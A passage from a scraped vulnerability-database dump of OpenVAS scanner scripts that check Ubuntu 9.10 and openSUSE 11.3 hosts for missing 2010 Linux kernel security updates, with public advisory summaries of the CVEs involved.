http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Gleb Napatov discovered that KVM did not correctly check certain privileged\n operations. A local attacker with access to a guest kernel could exploit\n this to crash the host system, leading to a denial of service.\n (CVE-2010-0435)\n\n Dan Jacobson discovered that ThinkPad video output was not correctly access\n controlled. A local attacker could exploit this to hang the system, leading\n to a denial of service. (CVE-2010-3448)\n \n It was discovered that KVM did not correctly initialize certain CPU\n registers. A local attacker could exploit this to crash the system, leading\n to a denial of service. (CVE-2010-3698)\n \n Dan Rosenberg discovered that the Linux kernel TIPC implementation\n contained multiple integer signedness errors. A local attacker could\n exploit this to gain root privileges. (CVE-2010-3859)\n \n Thomas Pollet discovered that the RDS network protocol did not\n check certain iovec buffers. A local attacker could exploit this\n to crash the system or possibly execute arbitrary code as the root\n user. (CVE-2010-3865)\n \n Dan Rosenberg discovered that the Linux kernel X.25 implementation\n incorrectly parsed facilities. A remote attacker could exploit this to\n crash the kernel, leading to a denial of service. (CVE-2010-3873)\n \n Dan Rosenberg discovered that the CAN protocol on 64bit systems did not\n correctly calculate the size of certain buffers. A local attacker could\n exploit this to crash the system or possibly execute arbitrary code as\n the root user. (CVE-2010-3874)\n \n Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did\n not correctly clear kernel memory. A local attacker could exploit this to\n read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)\n \n Vasiliy Kulikov discovered that the Linux kernel sockets implementation did\n not properly initialize certain structures. A local attacker could exploit\n this to read kernel stack memory, leading to a loss of privacy.\n (CVE-2010-3876)\n \n Vasiliy Kulikov discovered that the TIPC interface did not correctly\n initialize certain structures. A local attacker could exploit this to read\n kernel stack memory, leading to a loss of privacy. (CVE-2010-3877)\n \n Nelson Elhage discovered that the Linux kernel IPv4 implementation did not\n properly audit certain bytecodes in netlink messages. A local attacker\n could exploit this to cause the kernel to hang, leading to a denial of\n service. (CVE-2010-3880)\n \n Dan Rosenberg discovered that the USB subsystem did not correctly\n initialize certain structures. A local attacker could exploit this to read ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1073-1\";\ntag_affected = \"linux, linux-ec2 vulnerabilities on Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1073-1/\");\n script_id(840592);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-28 16:24:14 +0100 (Mon, 28 Feb 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1073-1\");\n script_cve_id(\"CVE-2010-0435\", \"CVE-2010-3448\", \"CVE-2010-3698\", \"CVE-2010-3859\", \"CVE-2010-3865\", \"CVE-2010-3873\", \"CVE-2010-3874\", \"CVE-2010-3875\", \"CVE-2010-3876\", \"CVE-2010-3877\", \"CVE-2010-3880\", \"CVE-2010-4074\", \"CVE-2010-4078\", \"CVE-2010-4079\", \"CVE-2010-4080\", \"CVE-2010-4081\", \"CVE-2010-4082\", \"CVE-2010-4083\", \"CVE-2010-4157\", \"CVE-2010-4160\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4248\", \"CVE-2010-4249\");\n script_name(\"Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1073-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307-ec2\", ver:\"2.6.31-307.27\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-307-ec2\", ver:\"2.6.31-307.27\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-386\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic-pae\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-386\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic-pae\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-virtual\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.31-307.27\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.31\", ver:\"2.6.31-307.27\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307\", ver:\"2.6.31-307.27\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.31\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.73\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-10-09T15:25:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4163", "CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4073", "CVE-2010-4165", "CVE-2010-4072", "CVE-2010-3437", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-0435", "CVE-2010-4080", "CVE-2010-4169", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-3442", "CVE-2010-3874", "CVE-2010-4157", "CVE-2010-4347", "CVE-2010-3067", "CVE-2010-4164", "CVE-2010-3432", "CVE-2010-4078", "CVE-2010-4175", "CVE-2010-3861"], "description": "The remote host is missing an update for the ", "modified": "2019-10-07T00:00:00", "published": "2011-01-11T00:00:00", "id": "OPENVAS:1361412562310850157", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850157", "type": "openvas", "title": "SuSE Update for kernel SUSE-SA:2011:001", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for kernel SUSE-SA:2011:001\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850157\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-01-11 16:07:49 +0100 (Tue, 11 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"SUSE-SA\", value:\"2011-001\");\n script_cve_id(\"CVE-2010-0435\", \"CVE-2010-3067\", \"CVE-2010-3432\", \"CVE-2010-3437\", \"CVE-2010-3442\", \"CVE-2010-3861\", \"CVE-2010-3865\", \"CVE-2010-3874\", \"CVE-2010-4072\", \"CVE-2010-4073\", \"CVE-2010-4078\", \"CVE-2010-4080\", \"CVE-2010-4081\", \"CVE-2010-4082\", \"CVE-2010-4083\", \"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-4162\", \"CVE-2010-4163\", \"CVE-2010-4164\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4175\", \"CVE-2010-4258\", \"CVE-2010-4347\");\n script_name(\"SuSE Update for kernel SUSE-SA:2011:001\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.3\");\n script_tag(name:\"impact\", value:\"local privilege escalation, remote denial of service\");\n script_tag(name:\"affected\", value:\"kernel on openSUSE 11.3\");\n script_tag(name:\"insight\", value:\"The openSUSE 11.3 kernel was updated to fix various bugs and security\n issues.\n\n The following security issues have been fixed:\n CVE-2010-4347: A local user could inject ACPI code into the kernel\n via the world-writable 'custom_debug' file, allowing local privilege\n escalation.\n\n CVE-2010-4258: A local attacker could use a Oops (kernel crash) caused\n by other flaws to write a 0 byte to a attacker controlled address\n in the kernel. This could lead to privilege escalation together with\n other issues.\n\n CVE-2010-4157: A 32bit vs 64bit integer mismatch in gdth_ioctl_alloc\n could lead to memory corruption in the GDTH driver.\n\n CVE-2010-4165: The do_tcp_setsockopt function in net/ipv4/tcp.c\n in the Linux kernel did not properly restrict TCP_MAXSEG (aka MSS)\n values, which allows local users to cause a denial of service (OOPS)\n via a setsockopt call that specifies a small value, leading to a\n divide-by-zero error or incorrect use of a signed integer.\n\n CVE-2010-4164: A remote (or local) attacker communicating over X.25\n could cause a kernel panic by attempting to negotiate malformed\n facilities.\n\n CVE-2010-4175: A local attacker could cause memory overruns in the\n RDS protocol stack, potentially crashing the kernel. So far it is\n considered not to be exploitable.\n\n CVE-2010-4169: Use-after-free vulnerability in mm/mprotect.c in the\n Linux kernel allowed local users to cause a denial of service via\n vectors involving an mprotect system call.\n\n CVE-2010-3874: A minor heap overflow in the CAN network module\n was fixed. Due to nature of the memory allocator it is likely not\n exploitable.\n\n CVE-2010-4158: A memory information leak in Berkeley packet filter\n rules allowed local attackers to read uninitialized memory of the\n kernel stack.\n\n CVE-2010-4162: A local denial of service in the blockdevice layer\n was fixed.\n\n CVE-2010-4163: By submitting certain I/O requests with 0 length,\n a local user could have caused a kernel panic.\n\n CVE-2010-0435: The Hypervisor in KVM 83, when the Intel VT-x extension\n is enabled, allows guest OS users to cause a denial of service\n (NULL pointer dereference and host OS crash) via vectors related to\n instruction emulation.\n\n CVE-2010-3861: The ethtool_get_rxnfc function in net/core/ethtool.c\n in the Linux kernel did not initialize a certain block of heap memory,\n which allowed local users to obtain potentially sensitive information\n via an ETHTOOL_GRXCLSRLALL ethtool command with a large info.rule_cnt\n value.\n\n CVE-2010-3442: Multiple integer overflows in the snd_ctl_ne ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE11.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-extra\", rpm:\"kernel-ec2-extra~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vmi\", rpm:\"kernel-vmi~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vmi-base\", rpm:\"kernel-vmi-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vmi-devel\", rpm:\"kernel-vmi-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.34.7~0.7.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-default\", rpm:\"preload-kmp-default~1.1_k2.6.34.7_0.7~19.1.11\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-desktop\", rpm:\"preload-kmp-desktop~1.1_k2.6.34.7_0.7~19.1.11\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-15T16:27:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4165", "CVE-2010-4074", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-0435", "CVE-2010-3859", "CVE-2010-4080", "CVE-2010-4169", "CVE-2010-3877", "CVE-2010-3875", "CVE-2010-3876", "CVE-2010-3698", "CVE-2010-4248", "CVE-2010-4079", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-4160", "CVE-2010-3873", "CVE-2010-3448", "CVE-2010-4078"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1073-1", "modified": "2019-03-13T00:00:00", "published": "2011-02-28T00:00:00", "id": "OPENVAS:1361412562310840592", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840592", "type": "openvas", "title": "Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1073-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1073_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux, linux-ec2 vulnerabilities USN-1073-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to 